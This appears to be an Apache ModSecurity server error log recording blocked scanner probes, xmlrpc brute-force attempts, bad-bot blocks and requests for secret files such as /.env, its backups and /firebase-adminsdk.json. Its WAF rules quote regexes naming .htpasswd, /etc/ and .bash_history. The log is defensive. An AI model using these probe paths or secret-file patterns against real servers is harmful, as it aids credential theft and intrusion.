[Tue May 26 14:14:35.185877 2026] [security2:error] [pid 598542:tid 598726] [client 4.201.75.230:56259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/inputs.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDPwAAADY"]
[Tue May 26 14:14:35.209259 2026] [security2:error] [pid 598542:tid 598688] [client 20.151.112.53:4565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/4.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDQAAAABA"]
[Tue May 26 14:14:35.209387 2026] [security2:error] [pid 598542:tid 598688] [client 20.151.112.53:4565] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/4.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDQAAAABA"]
[Tue May 26 14:14:35.402156 2026] [security2:error] [pid 598542:tid 598729] [client 20.151.112.53:22194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xstelth.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDSgAAADk"]
[Tue May 26 14:14:35.402260 2026] [security2:error] [pid 598542:tid 598729] [client 20.151.112.53:22194] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xstelth.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDSgAAADk"]
[Tue May 26 14:14:35.459235 2026] [security2:error] [pid 598542:tid 598768] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDSQAAAGA"], referer: https://www.anujtradingco.com/
[Tue May 26 14:14:35.748215 2026] [security2:error] [pid 598542:tid 598780] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdc_4iWyZxnXeAW3JDQwAAAGw"]
[Tue May 26 14:14:36.679842 2026] [security2:error] [pid 598542:tid 598794] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVddP4iWyZxnXeAW3JDYwAAAHo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 14:14:36.784224 2026] [ssl:error] [pid 598542:tid 598682] [client 3.233.59.216:7913] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpanel.service.google.com.anujtradingco.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:14:37.788303 2026] [security2:error] [pid 598542:tid 598679] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVddf4iWyZxnXeAW3JDfwAAAAc"]
[Tue May 26 14:14:39.569458 2026] [security2:error] [pid 598542:tid 598730] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdd_4iWyZxnXeAW3JDxQAAADo"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1217746&moderation-hash=b9c58b9a9d05bfd184d31dfeca76a54d
[Tue May 26 14:14:39.742556 2026] [security2:error] [pid 598542:tid 598705] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdd_4iWyZxnXeAW3JDuwAAACE"]
[Tue May 26 14:14:40.450085 2026] [security2:error] [pid 598542:tid 598787] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdeP4iWyZxnXeAW3JD3QAAAHM"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1217746&moderation-hash=b9c58b9a9d05bfd184d31dfeca76a54d
[Tue May 26 14:14:41.450248 2026] [security2:error] [pid 598542:tid 598685] [client 4.201.75.230:56264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/ioxi-o.php"] [unique_id "ahVdef4iWyZxnXeAW3JD9wAAAA0"]
[Tue May 26 14:14:41.582552 2026] [security2:error] [pid 598542:tid 598700] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdef4iWyZxnXeAW3JD7gAAABw"]
[Tue May 26 14:14:41.984856 2026] [security2:error] [pid 598542:tid 598676] [client 202.141.30.10:65316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdef4iWyZxnXeAW3JD_wAAAAQ"]
[Tue May 26 14:14:41.985007 2026] [security2:error] [pid 598542:tid 598676] [client 202.141.30.10:65316] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdef4iWyZxnXeAW3JD_wAAAAQ"]
[Tue May 26 14:14:44.136573 2026] [security2:error] [pid 598542:tid 598681] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVde_4iWyZxnXeAW3JEMwAAAAk"]
[Tue May 26 14:14:45.324817 2026] [security2:error] [pid 598542:tid 598740] [client 91.244.65.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdfP4iWyZxnXeAW3JEYQAAAEQ"]
[Tue May 26 14:14:45.929823 2026] [security2:error] [pid 598542:tid 598756] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdff4iWyZxnXeAW3JEcgAAAFQ"]
[Tue May 26 14:14:45.959430 2026] [security2:error] [pid 598542:tid 598692] [client 95.142.47.113:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdff4iWyZxnXeAW3JEigAAABQ"], referer: https://anujtradingco.com/top-deejay-headphones/
[Tue May 26 14:14:48.666895 2026] [security2:error] [pid 598542:tid 598728] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdgP4iWyZxnXeAW3JE2gAAADg"]
[Tue May 26 14:14:50.833910 2026] [security2:error] [pid 598542:tid 598680] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdgv4iWyZxnXeAW3JFHAAAAAg"]
[Tue May 26 14:14:53.114652 2026] [security2:error] [pid 598542:tid 598772] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdhP4iWyZxnXeAW3JFUQAAAGQ"]
[Tue May 26 14:14:54.888307 2026] [security2:error] [pid 598542:tid 598791] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdhv4iWyZxnXeAW3JFfAAAAHc"]
[Tue May 26 14:14:54.972687 2026] [security2:error] [pid 598542:tid 598777] [client 202.141.30.10:35348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdhv4iWyZxnXeAW3JFkgAAAGk"]
[Tue May 26 14:14:54.973267 2026] [security2:error] [pid 598542:tid 598777] [client 202.141.30.10:35348] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdhv4iWyZxnXeAW3JFkgAAAGk"]
[Tue May 26 14:14:55.004091 2026] [security2:error] [pid 598542:tid 598701] [client 85.208.96.204:63388] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVdh_4iWyZxnXeAW3JFlAAAAB0"]
[Tue May 26 14:14:55.004282 2026] [security2:error] [pid 598542:tid 598701] [client 85.208.96.204:63388] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVdh_4iWyZxnXeAW3JFlAAAAB0"]
[Tue May 26 14:14:57.419195 2026] [security2:error] [pid 598542:tid 598724] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdiP4iWyZxnXeAW3JFxgAAADQ"]
[Tue May 26 14:14:59.866482 2026] [security2:error] [pid 598542:tid 598788] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdi_4iWyZxnXeAW3JGBgAAAHQ"]
[Tue May 26 14:15:02.010788 2026] [security2:error] [pid 598542:tid 598777] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdjf4iWyZxnXeAW3JGPgAAAGk"]
[Tue May 26 14:15:02.083608 2026] [security2:error] [pid 598542:tid 598703] [client 114.119.156.126:33563] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/amarone-classico/"] [unique_id "ahVdjv4iWyZxnXeAW3JGUQAAAB8"], referer: http://haddingtonwines.com/product-category/red-wine/
[Tue May 26 14:15:03.630473 2026] [security2:error] [pid 598542:tid 598776] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdj_4iWyZxnXeAW3JGcAAAAGg"]
[Tue May 26 14:15:04.068667 2026] [security2:error] [pid 598542:tid 598789] [client 202.141.30.10:65465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdj_4iWyZxnXeAW3JGiAAAAHU"]
[Tue May 26 14:15:04.068792 2026] [security2:error] [pid 598542:tid 598789] [client 202.141.30.10:65465] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdj_4iWyZxnXeAW3JGiAAAAHU"]
[Tue May 26 14:15:05.847860 2026] [security2:error] [pid 598542:tid 598706] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdkf4iWyZxnXeAW3JGqQAAACI"]
[Tue May 26 14:15:08.063164 2026] [security2:error] [pid 598542:tid 598769] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdk_4iWyZxnXeAW3JG2gAAAGE"]
[Tue May 26 14:15:08.295572 2026] [security2:error] [pid 598542:tid 598551] [remote 74.7.241.58:54014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVdlP4iWyZxnXeAW3JG5wAAKAg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fa
[Tue May 26 14:15:10.890619 2026] [security2:error] [pid 598542:tid 598720] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdlv4iWyZxnXeAW3JHFgAAADA"]
[Tue May 26 14:15:12.269799 2026] [security2:error] [pid 598542:tid 598736] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdl_4iWyZxnXeAW3JHMQAAAEA"]
[Tue May 26 14:15:14.784565 2026] [security2:error] [pid 598542:tid 598771] [client 202.141.30.10:35539] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdmv4iWyZxnXeAW3JHfAAAAGM"]
[Tue May 26 14:15:14.784679 2026] [security2:error] [pid 598542:tid 598771] [client 202.141.30.10:35539] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdmv4iWyZxnXeAW3JHfAAAAGM"]
[Tue May 26 14:15:15.148009 2026] [security2:error] [pid 598542:tid 598710] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdmv4iWyZxnXeAW3JHewAAACY"]
[Tue May 26 14:15:16.168086 2026] [security2:error] [pid 598542:tid 598731] [client 113.15.120.63:24001] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "newdental.com.co"] [uri "/wp-comments-post.php"] [unique_id "ahVdm_4iWyZxnXeAW3JHkQAAADs"]
[Tue May 26 14:15:17.239018 2026] [security2:error] [pid 598542:tid 598702] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdnP4iWyZxnXeAW3JHpgAAAB4"]
[Tue May 26 14:15:19.251640 2026] [security2:error] [pid 598542:tid 598787] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdnv4iWyZxnXeAW3JH2AAAAHM"]
[Tue May 26 14:15:21.102184 2026] [security2:error] [pid 598542:tid 598711] [client 45.45.237.225:48458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env"] [unique_id "ahVdof4iWyZxnXeAW3JIIQAAACc"]
[Tue May 26 14:15:21.182579 2026] [security2:error] [pid 598542:tid 598784] [client 45.45.237.225:48470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env.backup"] [unique_id "ahVdof4iWyZxnXeAW3JIIwAAAHA"]
[Tue May 26 14:15:21.194733 2026] [security2:error] [pid 598542:tid 598729] [client 45.45.237.225:48458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env.bak"] [unique_id "ahVdof4iWyZxnXeAW3JIJQAAADk"]
[Tue May 26 14:15:21.376318 2026] [security2:error] [pid 598542:tid 598702] [client 45.45.237.225:48648] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bramas.in"] [uri "/firebase-adminsdk.json"] [unique_id "ahVdof4iWyZxnXeAW3JINwAAAB4"]
[Tue May 26 14:15:21.376444 2026] [security2:error] [pid 598542:tid 598702] [client 45.45.237.225:48648] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bramas.in"] [uri "/firebase-adminsdk.json"] [unique_id "ahVdof4iWyZxnXeAW3JINwAAAB4"]
[Tue May 26 14:15:21.838360 2026] [security2:error] [pid 598542:tid 598794] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdof4iWyZxnXeAW3JIQgAAAHo"]
[Tue May 26 14:15:24.200744 2026] [security2:error] [pid 598542:tid 598764] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdo_4iWyZxnXeAW3JIiAAAAFw"]
[Tue May 26 14:15:25.033739 2026] [security2:error] [pid 598542:tid 598789] [client 110.249.202.40:18970] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/robots.txt"] [unique_id "ahVdpf4iWyZxnXeAW3JIqgAAAHU"]
[Tue May 26 14:15:25.686054 2026] [security2:error] [pid 598542:tid 598706] [client 202.141.30.10:35379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdpf4iWyZxnXeAW3JIvAAAACI"]
[Tue May 26 14:15:25.686188 2026] [security2:error] [pid 598542:tid 598706] [client 202.141.30.10:35379] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdpf4iWyZxnXeAW3JIvAAAACI"]
[Tue May 26 14:15:26.051498 2026] [security2:error] [pid 598542:tid 598748] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdpf4iWyZxnXeAW3JIuwAAAEw"]
[Tue May 26 14:15:30.425656 2026] [security2:error] [pid 598542:tid 598766] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdqv4iWyZxnXeAW3JJPwAAAF4"]
[Tue May 26 14:15:30.791941 2026] [security2:error] [pid 598542:tid 598779] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdqv4iWyZxnXeAW3JJSQAAAGs"]
[Tue May 26 14:15:30.873443 2026] [security2:error] [pid 598542:tid 598756] [client 85.204.70.118:33932] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "siliconelevators.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVdqv4iWyZxnXeAW3JJXQAAAFQ"]
[Tue May 26 14:15:31.243989 2026] [security2:error] [pid 598542:tid 598794] [client 47.157.222.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdqv4iWyZxnXeAW3JJWQAAAHo"]
